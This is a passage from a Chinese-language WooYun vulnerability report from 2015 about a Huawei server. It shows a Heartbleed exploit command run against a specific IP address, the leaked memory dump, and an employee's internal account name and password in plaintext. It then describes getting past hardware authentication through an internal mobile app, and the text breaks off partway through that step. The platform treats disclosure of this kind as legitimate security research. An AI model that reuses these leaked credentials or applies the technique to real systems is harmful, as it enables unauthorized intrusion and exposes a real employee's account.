某漏洞导致的一次对华为成功漫游（影响大量内部系统、敏感邮件、人员架构等）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0126365

漏洞标题：某漏洞导致的一次对华为成功漫游（影响大量内部系统、敏感邮件、人员架构等）

漏洞作者： fuckadmin

提交时间：2015-07-12 23:57

修复时间：2015-08-27 18:32

公开时间：2015-08-27 18:32

漏洞类型：重要敏感信息泄露

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-07-12：细节已通知厂商并且等待厂商处理中
2015-07-13：厂商已经确认，细节仅向厂商公开
2015-07-23：细节向核心白帽子及相关领域专家公开
2015-08-02：细节向普通白帽子公开
2015-08-12：细节向实习白帽子公开
2015-08-27：细节向公众公开

简要描述：

正面进不了华为，看我如何绕过变态的华为内部认证，进入内部网络。

详细说明：

在杀器王子提交的漏洞中，已经成功的抓取到华为某位员工的内部账号和密码。
1. WooYun: 华为某重要服务器存在心脏滴血漏洞可以查看密码

python openssl.py 119.145.14.47 443|more
[{"type": 0, "description": "IP:119.145.14.47:443<br>\u5b58\u5728openssl \u4fe1\
u606f\u6cc4\u9732\uff1a <br>\[email protected][...r....+..H...9........w.3....f.....\".!
.9.8.........5.............................3.2.....E.D...../...A................
.................I...........4.2................................................
...#.......PF..G.. iPhone OS8.1..x-device-name: iPhone..x-device-type: ios..x-cl
ient-version: V2.2.0.210..Content-Length: 85....{.   \"appId\" : \"espace\",.   
\"loginName\" : \"x00246451\",.   \"password\" : \"whXF07!@\".}

账号：x00246451
密码：whXF07!@

漏洞证明：

2.成功登录员工系统
差旅平台

员工职位信息

内部华为心声平台

围观内部员工吐槽

3.虽然得到了内部员工的账号信息，但还是无法正面通过华为变态的硬件认证进行VPN、mail、oa等内部系统，进一步扩大战果。
但华为安全人员万万没想到的是，如果通过内部APP呢？
4.成功进行内部系统
http://w3m.huawei.com/m/servlet/index?locale=zh_CN
由于该站点提供了内部使用的APP，好家伙，我们来测试下。
（1）进入w3 mobile